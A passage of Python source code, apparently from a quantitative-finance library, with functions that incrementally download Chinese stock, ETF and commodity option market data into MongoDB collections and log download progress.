                            frequences.index(frequence),
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_index_min(
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # nothing stored yet for this (code, frequence):
                    # download from the fixed initial date
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB07.{} Now Saving {} from {} to {} =={} '.format(
                            frequences.index(frequence),
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_index_min(
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except Exception as e:
            # record the failing code but keep the batch going; log the
            # reason instead of silently swallowing it
            QA_util_log_info(e, ui_log=ui_log)
            err.append(code)

    # the context manager guarantees the pool is shut down when done
    with ThreadPoolExecutor(max_workers=4) as executor:
        res = {
            executor.submit(__saving_work,
                            __index_list.index[i_][0],
                            coll)
            for i_ in range(len(__index_list))
        }  # multi index ./.
        count = 1
        for i_ in concurrent.futures.as_completed(res):
            QA_util_log_info(
                'The {} of Total {}'.format(count,
                                            len(__index_list)),
                ui_log=ui_log
            )
            strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
                str(float(count / len(__index_list) * 100))[0:4] + '%'
            )
            intLogProgress = int(float(count / len(__index_list) * 10000.0))
            QA_util_log_info(
                strLogProgress,
                ui_log=ui_log,
                ui_progress=ui_progress,
                ui_progress_int_value=intLogProgress
            )
            count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_single_etf_min(code : str, client=DATABASE, ui_log=None, ui_progress=None):
    """save single etf_min

    Incrementally downloads 1/5/15/30/60-minute bars of one ETF into the
    ``index_min`` collection, resuming each frequency from the last
    stored ``datetime``.

    Keyword Arguments:
        code -- single etf code
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    #__index_list = QA_fetch_get_stock_list('etf')
    __index_list = [code]
    coll = client.index_min
    coll.create_index(
        [
            ('code',
             pymongo.ASCENDING),
            ('time_stamp',
             pymongo.ASCENDING),
            ('date_stamp',
             pymongo.ASCENDING)
        ]
    )
    err = []
    # maintained bar frequencies; the list position doubles as the JOB07 sub-id
    frequences = ['1min', '5min', '15min', '30min', '60min']

    def __saving_work(code, coll):
        QA_util_log_info(
            '##JOB07 Now Saving ETF_MIN ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            for frequence in frequences:
                ref_ = coll.find({'code': str(code)[0:6], 'type': frequence})
                end_time = str(now_time())[0:19]
                if ref_.count() > 0:
                    # resume from the last stored bar; the first fetched row
                    # duplicates the stored one, hence the [1::] slice below
                    start_time = ref_[ref_.count() - 1]['datetime']
                    QA_util_log_info(
                        '##JOB07.{} Now Saving {} from {} to {} =={} '.format(
                            frequences.index(frequence),
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_index_min(
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data[1::])
                            )
                else:
                    # nothing stored yet for this (code, frequence):
                    # download from the fixed initial date
                    start_time = '2015-01-01'
                    QA_util_log_info(
                        '##JOB07.{} Now Saving {} from {} to {} =={} '.format(
                            frequences.index(frequence),
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        ),
                        ui_log=ui_log
                    )
                    if start_time != end_time:
                        __data = QA_fetch_get_index_min(
                            str(code),
                            start_time,
                            end_time,
                            frequence
                        )
                        if len(__data) > 1:
                            coll.insert_many(
                                QA_util_to_json_from_pandas(__data)
                            )
        except Exception as e:
            # record the failing code but keep going; log the reason
            # instead of silently swallowing it
            QA_util_log_info(e, ui_log=ui_log)
            err.append(code)

    # the context manager guarantees the pool is shut down when done
    with ThreadPoolExecutor(max_workers=4) as executor:
        res = {
            executor.submit(__saving_work,
                            __index_list[i_],
                            coll)
            for i_ in range(len(__index_list))
        }  # multi index ./.
        count = 1
        for i_ in concurrent.futures.as_completed(res):
            QA_util_log_info(
                'The {} of Total {}'.format(count,
                                            len(__index_list)),
                ui_log=ui_log
            )
            strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
                str(float(count / len(__index_list) * 100))[0:4] + '%'
            )
            intLogProgress = int(float(count / len(__index_list) * 10000.0))
            QA_util_log_info(
                strLogProgress,
                ui_log=ui_log,
                ui_progress=ui_progress,
                ui_progress_int_value=intLogProgress
            )
            count = count + 1
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_stock_list(client=DATABASE, ui_log=None, ui_progress=None):
    """save stock_list

    Replaces the ``stock_list`` collection with a freshly fetched list.
    The old collection is dropped only after new data has been obtained
    (same safeguard as QA_SU_save_etf_list), so a failed fetch does not
    leave the database empty.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    try:
        # 🛠todo this should be the very first task JOB01 -- refresh the
        # stock list before everything else
        QA_util_log_info(
            '##JOB08 Now Saving STOCK_LIST ====',
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=5000
        )
        stock_list_from_tdx = QA_fetch_get_stock_list()
        pandas_data = QA_util_to_json_from_pandas(stock_list_from_tdx)
        if len(pandas_data) > 0:
            # only drop the old collection once fresh data is in hand
            client.drop_collection('stock_list')
            coll = client.stock_list
            coll.create_index('code')
            coll.insert_many(pandas_data)
            QA_util_log_info(
                "完成股票列表获取",
                ui_log=ui_log,
                ui_progress=ui_progress,
                ui_progress_int_value=10000
            )
    except Exception as e:
        QA_util_log_info(e, ui_log=ui_log)
        print(" Error save_tdx.QA_SU_save_stock_list exception!")
        pass
def QA_SU_save_etf_list(client=DATABASE, ui_log=None, ui_progress=None):
    """save etf_list

    Refreshes the ``etf_list`` collection from tdx; the old collection is
    dropped only once fresh data has been obtained.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
    """
    try:
        QA_util_log_info(
            '##JOB16 Now Saving ETF_LIST ====',
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=5000
        )
        records = QA_util_to_json_from_pandas(
            QA_fetch_get_stock_list(type_="etf")
        )
        if len(records) > 0:
            # only drop the old collection after data was fetched
            client.drop_collection('etf_list')
            etf_coll = client.etf_list
            etf_coll.create_index('code')
            etf_coll.insert_many(records)
            QA_util_log_info(
                "完成ETF列表获取",
                ui_log=ui_log,
                ui_progress=ui_progress,
                ui_progress_int_value=10000
            )
    except Exception as e:
        QA_util_log_info(e, ui_log=ui_log)
        print(" Error save_tdx.QA_SU_save_etf_list exception!")
        pass
def QA_SU_save_stock_block(client=DATABASE, ui_log=None, ui_progress=None):
    """save stock_block

    Rebuilds the ``stock_block`` collection from three sources in turn:
    'tdx', 'ths' and 'QA'. Completion (progress 10000) is reported once,
    only after every source has been inserted -- the original emitted it
    prematurely before the 'QA' blocks were saved.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    client.drop_collection('stock_block')
    coll = client.stock_block
    coll.create_index('code')
    try:
        QA_util_log_info(
            '##JOB09 Now Saving STOCK_BlOCK ====',
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=5000
        )
        coll.insert_many(
            QA_util_to_json_from_pandas(QA_fetch_get_stock_block('tdx'))
        )
        QA_util_log_info(
            'tdx Block ====',
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=5000
        )
        # 🛠todo fixhere: fetching the ths (同花顺) blocks still goes
        # through the tdx fetcher
        coll.insert_many(
            QA_util_to_json_from_pandas(QA_fetch_get_stock_block('ths'))
        )
        QA_util_log_info(
            'ths Block ====',
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=8000
        )
        coll.insert_many(
            QA_util_to_json_from_pandas(QA_fetch_get_stock_block('QA'))
        )
        QA_util_log_info(
            'QA_Select Block ====',
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=8000
        )
        # report completion exactly once, after all three sources
        QA_util_log_info(
            '完成股票板块获取=',
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=10000
        )
    except Exception as e:
        QA_util_log_info(e, ui_log=ui_log)
        print(" Error save_tdx.QA_SU_save_stock_block exception!")
        pass
def QA_SU_save_stock_info(client=DATABASE, ui_log=None, ui_progress=None):
    """save stock_info

    Rebuilds the ``stock_info`` collection by fetching the info record of
    every stock in the current list; failing codes are collected in
    ``err`` and reported at the end.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    client.drop_collection('stock_info')
    stock_list = QA_fetch_get_stock_list().code.unique().tolist()
    coll = client.stock_info
    coll.create_index('code')
    err = []

    def __saving_work(code, coll):
        QA_util_log_info(
            '##JOB10 Now Saving STOCK INFO ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            coll.insert_many(
                QA_util_to_json_from_pandas(QA_fetch_get_stock_info(str(code)))
            )
        except Exception as e:
            # log the reason instead of silently swallowing it
            QA_util_log_info(e, ui_log=ui_log)
            err.append(str(code))

    for i_ in range(len(stock_list)):
        # __saving_work('000001')
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(i_ / len(stock_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(i_ / len(stock_list) * 10000.0))
        QA_util_log_info('The {} of Total {}'.format(i_, len(stock_list)))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(stock_list[i_], coll)
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def QA_SU_save_stock_transaction(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    """save stock_transaction

    Downloads the full tick/transaction history (from 1990-01-01 to
    today) of every stock in the current list into the
    ``stock_transaction`` collection; failing codes are collected in
    ``err`` and reported at the end.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    stock_list = QA_fetch_get_stock_list().code.unique().tolist()
    coll = client.stock_transaction
    coll.create_index('code')
    err = []

    def __saving_work(code):
        QA_util_log_info(
            '##JOB11 Now Saving STOCK_TRANSACTION ==== {}'.format(str(code)),
            ui_log=ui_log
        )
        try:
            coll.insert_many(
                QA_util_to_json_from_pandas(
                    # 🛠todo str(stock_list[code]) wrong argument?
                    QA_fetch_get_stock_transaction(
                        str(code),
                        '1990-01-01',
                        str(now_time())[0:10]
                    )
                )
            )
        except Exception as e:
            # log the reason instead of silently swallowing it
            QA_util_log_info(e, ui_log=ui_log)
            err.append(str(code))

    for i_ in range(len(stock_list)):
        # __saving_work('000001')
        QA_util_log_info(
            'The {} of Total {}'.format(i_,
                                        len(stock_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(i_ / len(stock_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(float(i_ / len(stock_list) * 10000.0))
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(stock_list[i_])
    if len(err) < 1:
        QA_util_log_info('SUCCESS', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
########################################################################################################
def _save_option_commodity_ru_day(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    """Save daily bars of RU (natural rubber) commodity option contracts.

    Incrementally updates the ``option_commodity_ru_day`` collection,
    resuming each contract from the last stored ``date``.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    ##################### RU natural rubber ######################################################################
    option_ru_contract_list = QA_fetch_get_commodity_option_RU_contract_time_to_market()
    coll_option_commodity_ru_day = client.option_commodity_ru_day
    coll_option_commodity_ru_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []

    def __saving_work(code, coll_option_commodity_ru_day):
        try:
            QA_util_log_info(
                '##JOB12 Now Saving OPTION_DAY_COMMODITY_RU 天然橡胶 ==== {}'.format(
                    str(code)
                ),
                ui_log=ui_log
            )
            # first check whether the DB already has data for this code
            ref = coll_option_commodity_ru_day.find({'code': str(code)[0:8]})
            end_date = str(now_time())[0:10]
            # if data exists, continue with an incremental update; the guard
            # also avoids a negative-index problem for freshly listed
            # contracts that have no stored rows yet
            if ref.count() > 0:
                # resume from the last fetched date
                start_date = ref[ref.count() - 1]['date']
                QA_util_log_info(
                    ' 上次获取 期权ru 天然橡胶 日线数据的最后日期是 {}'.format(start_date),
                    ui_log=ui_log
                )
                QA_util_log_info(
                    'UPDATE_OPTION_RU_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    start_date0 = QA_util_get_next_day(start_date)
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date0,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
                            start_date0,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_ru_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "^已经获取过这天的数据了^ {}".format(start_date),
                        ui_log=ui_log
                    )
            else:
                # nothing stored yet: download the whole history
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_RU_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
                            start_date,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_ru_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "*已经获取过这天的数据了* {}".format(start_date),
                        ui_log=ui_log
                    )
        except Exception as error0:
            # route the failure to the UI log as well, then record the code
            QA_util_log_info(error0, ui_log=ui_log)
            err.append(str(code))

    for item in range(len(option_ru_contract_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(option_ru_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(option_ru_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(
            float(item / len(option_ru_contract_list) * 10000.0)
        )
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(
            option_ru_contract_list[item].code,
            coll_option_commodity_ru_day
        )
    if len(err) < 1:
        QA_util_log_info('SUCCESS save option ru day ^_^ ', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_c_day(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    """Save daily bars of C (corn) commodity option contracts.

    Incrementally updates the ``option_commodity_c_day`` collection,
    resuming each contract from the last stored ``date``.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    ##################### C corn #################################################################################
    option_c_contract_list = QA_fetch_get_commodity_option_C_contract_time_to_market()
    coll_option_commodity_c_day = client.option_commodity_c_day
    coll_option_commodity_c_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []

    def __saving_work(code, coll_option_commodity_c_day):
        try:
            QA_util_log_info(
                '##JOB12 Now Saving OPTION_DAY_COMMODITY_C 玉米 ==== {}'.format(
                    str(code)
                ),
                ui_log=ui_log
            )
            # first check whether the DB already has data for this code
            ref = coll_option_commodity_c_day.find({'code': str(code)[0:8]})
            end_date = str(now_time())[0:10]
            # if data exists, continue with an incremental update; the guard
            # also avoids a negative-index problem for freshly listed
            # contracts that have no stored rows yet
            if ref.count() > 0:
                # resume from the last fetched date
                start_date = ref[ref.count() - 1]['date']
                QA_util_log_info(
                    ' 上次获取 期权c 玉米 日线数据的最后日期是 {}'.format(start_date),
                    ui_log=ui_log
                )
                QA_util_log_info(
                    'UPDATE_OPTION_C_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    start_date0 = QA_util_get_next_day(start_date)
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date0,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
                            start_date0,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_c_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "^已经获取过这天的数据了^ {}".format(start_date),
                        ui_log=ui_log
                    )
            else:
                # nothing stored yet: download the whole history
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_C_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
                            start_date,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_c_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "*已经获取过这天的数据了* {}".format(start_date),
                        ui_log=ui_log
                    )
        except Exception as error0:
            # route the failure to the UI log as well, then record the code
            QA_util_log_info(error0, ui_log=ui_log)
            err.append(str(code))

    for item in range(len(option_c_contract_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(option_c_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(option_c_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(
            float(item / len(option_c_contract_list) * 10000.0)
        )
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(
            option_c_contract_list[item].code,
            coll_option_commodity_c_day
        )
    if len(err) < 1:
        QA_util_log_info('SUCCESS save option c day ^_^ ', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_cf_day(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    """Save daily bars of CF (cotton) commodity option contracts.

    Incrementally updates the ``option_commodity_cf_day`` collection,
    resuming each contract from the last stored ``date``.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    ##################### CF cotton ##############################################################################
    option_cf_contract_list = QA_fetch_get_commodity_option_CF_contract_time_to_market()
    coll_option_commodity_cf_day = client.option_commodity_cf_day
    coll_option_commodity_cf_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []

    def __saving_work(code, coll_option_commodity_cf_day):
        try:
            QA_util_log_info(
                '##JOB12 Now Saving OPTION_DAY_COMMODITY_CF 棉花 ==== {}'.format(
                    str(code)
                ),
                ui_log=ui_log
            )
            # first check whether the DB already has data for this code
            ref = coll_option_commodity_cf_day.find({'code': str(code)[0:8]})
            end_date = str(now_time())[0:10]
            # if data exists, continue with an incremental update; the guard
            # also avoids a negative-index problem for freshly listed
            # contracts that have no stored rows yet
            if ref.count() > 0:
                # resume from the last fetched date
                start_date = ref[ref.count() - 1]['date']
                QA_util_log_info(
                    ' 上次获取 期权cf 棉花 日线数据的最后日期是 {}'.format(start_date),
                    ui_log=ui_log
                )
                QA_util_log_info(
                    'UPDATE_OPTION_CF_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    start_date0 = QA_util_get_next_day(start_date)
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date0,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
                            start_date0,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_cf_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "^已经获取过这天的数据了^ {}".format(start_date),
                        ui_log=ui_log
                    )
            else:
                # nothing stored yet: download the whole history
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_CF_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
                            start_date,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_cf_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "*已经获取过这天的数据了* {}".format(start_date),
                        ui_log=ui_log
                    )
        except Exception as error0:
            # route the failure to the UI log as well, then record the code
            QA_util_log_info(error0, ui_log=ui_log)
            err.append(str(code))

    for item in range(len(option_cf_contract_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(option_cf_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(option_cf_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(
            float(item / len(option_cf_contract_list) * 10000.0)
        )
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(
            option_cf_contract_list[item].code,
            coll_option_commodity_cf_day
        )
    if len(err) < 1:
        QA_util_log_info('SUCCESS save option cf day ^_^ ', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_sr_day(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    """Save daily bars of SR (white sugar) commodity option contracts.

    Incrementally updates the ``option_commodity_sr_day`` collection,
    resuming each contract from the last stored ``date``.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    ##################### SR white sugar #########################################################################
    option_sr_contract_list = QA_fetch_get_commodity_option_SR_contract_time_to_market(
    )
    coll_option_commodity_sr_day = client.option_commodity_sr_day
    coll_option_commodity_sr_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []

    def __saving_work(code, coll_option_commodity_sr_day):
        try:
            QA_util_log_info(
                '##JOB12 Now Saving OPTION_DAY_COMMODITY_SR 白糖 ==== {}'.format(
                    str(code)
                ),
                ui_log=ui_log
            )
            # first check whether the DB already has data for this code
            ref = coll_option_commodity_sr_day.find({'code': str(code)[0:8]})
            end_date = str(now_time())[0:10]
            # if data exists, continue with an incremental update; the guard
            # also avoids a negative-index problem for freshly listed
            # contracts that have no stored rows yet
            if ref.count() > 0:
                # resume from the last fetched date
                start_date = ref[ref.count() - 1]['date']
                QA_util_log_info(
                    ' 上次获取期权sr白糖日线数据的最后日期是 {}'.format(start_date),
                    ui_log=ui_log
                )
                QA_util_log_info(
                    'UPDATE_OPTION_SR_DAY \n 从上一次下载数据开始继续 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    start_date0 = QA_util_get_next_day(start_date)
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date0,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 返回了{}条记录 , 准备写入数据库".format(
                            start_date0,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_sr_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "^已经获取过这天的数据了^ {}".format(start_date),
                        ui_log=ui_log
                    )
            else:
                # nothing stored yet: download the whole history
                start_date = '1990-01-01'
                QA_util_log_info(
                    'UPDATE_SR_OPTION_DAY \n 从新开始下载数据 Trying update {} from {} to {}'
                    .format(code,
                            start_date,
                            end_date),
                    ui_log=ui_log
                )
                if start_date != end_date:
                    df0 = QA_fetch_get_option_day(
                        code=code,
                        start_date=start_date,
                        end_date=end_date,
                        frequence='day',
                        ip=None,
                        port=None
                    )
                    retCount = df0.iloc[:, 0].size
                    QA_util_log_info(
                        "日期从开始{}-结束{} , 合约代码{} , 获取了{}条记录 , 准备写入数据库^_^ ".format(
                            start_date,
                            end_date,
                            code,
                            retCount
                        ),
                        ui_log=ui_log
                    )
                    coll_option_commodity_sr_day.insert_many(
                        QA_util_to_json_from_pandas(df0)
                    )
                else:
                    QA_util_log_info(
                        "*已经获取过这天的数据了* {}".format(start_date),
                        ui_log=ui_log
                    )
        except Exception as error0:
            # route the failure to the UI log as well, then record the code
            QA_util_log_info(error0, ui_log=ui_log)
            err.append(str(code))

    for item in range(len(option_sr_contract_list)):
        QA_util_log_info(
            'The {} of Total {}'.format(item,
                                        len(option_sr_contract_list)),
            ui_log=ui_log
        )
        strLogProgress = 'DOWNLOAD PROGRESS {} '.format(
            str(float(item / len(option_sr_contract_list) * 100))[0:4] + '%'
        )
        intLogProgress = int(
            float(item / len(option_sr_contract_list) * 10000.0)
        )
        QA_util_log_info(
            strLogProgress,
            ui_log=ui_log,
            ui_progress=ui_progress,
            ui_progress_int_value=intLogProgress
        )
        __saving_work(
            option_sr_contract_list[item].code,
            coll_option_commodity_sr_day
        )
    if len(err) < 1:
        QA_util_log_info('SUCCESS save option sr day ^_^ ', ui_log=ui_log)
    else:
        QA_util_log_info(' ERROR CODE \n ', ui_log=ui_log)
        QA_util_log_info(err, ui_log=ui_log)
def _save_option_commodity_m_day(
        client=DATABASE,
        ui_log=None,
        ui_progress=None
):
    """Save daily bars of M (soybean meal) commodity option contracts.

    Incrementally updates the ``option_commodity_m_day`` collection,
    resuming each contract from the last stored ``date``.

    Keyword Arguments:
        client {[type]} -- [description] (default: {DATABASE})
        ui_log -- optional UI log hook forwarded to QA_util_log_info
        ui_progress -- optional UI progress hook
    """
    ##################### M soybean meal #########################################################################
    option_m_contract_list = QA_fetch_get_commodity_option_M_contract_time_to_market(
    )
    coll_option_commodity_m_day = client.option_commodity_m_day
    coll_option_commodity_m_day.create_index(
        [("code",
          pymongo.ASCENDING),
         ("date_stamp",
          pymongo.ASCENDING)]
    )
    err = []

    def __saving_work(code, coll_option_commodity_m_day):
        # Incrementally save one contract; failures are appended to `err`.
        try:
            QA_util_log_info(
                '##JOB12 Now Saving OPTION_DAY_COMMODITY_M 豆粕 ==== {}'.format(
                    str(code)
                ),
                ui_log=ui_log
            )
            # first check whether the DB already has data for this code
